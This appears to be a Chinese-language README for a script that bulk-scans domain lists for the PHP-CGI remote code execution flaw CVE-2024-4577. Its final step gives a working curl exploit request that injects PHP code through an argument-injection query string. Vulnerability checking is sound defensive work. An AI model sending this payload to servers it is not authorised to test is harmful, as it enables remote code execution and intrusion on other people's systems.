该脚本用于检查 CVE-2024-4577 所描述的漏洞,该漏洞涉及利用某些 PHP 配置在远程执行任意代码。它会向指定域列表中的端点发送 POST 请求,并检查响应是否表明存在漏洞。
安装 GNU Parallel:
sudo apt-get install parallel
克隆仓库: 使用 Git 将此仓库克隆到本地计算机:
git clone https://github.com/Yukiioz/CVE-2024-4577.git
进入仓库目录: 切换到克隆的目录:
cd CVE-2024-4577
准备域名列表: 创建一个包含待检查域名的文本文件。每个域名应单独一行。例如:
https://example1.com
https://example2.com
https://example3.com
运行脚本:
执行脚本 CVE-2024-4577.sh,并将域名列表文件路径作为参数传入:
./CVE-2024-4577.sh live-subdomains.txt | tee script.log
查看输出:
脚本在检查每个域时会显示进度信息。如果发现某个域存在漏洞,会以红色高亮显示。脚本还会将漏洞域列表导出到名为 vulnerable_domains.txt 的文件中。
vulnerable_domains.txt脚本会将漏洞域列表导出到名为 vulnerable_domains.txt 的文件中。该文件包含简单的漏洞域列表,每个域一行。如需进一步手动确认,可使用 curl 命令向该域的目标端点发送 POST 请求。将 https://dev.example.com/test.php 替换为实际目标域中的端点。
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
-H "User-Agent: curl/8.3.0" \
--data "<?php phpinfo(); ?>"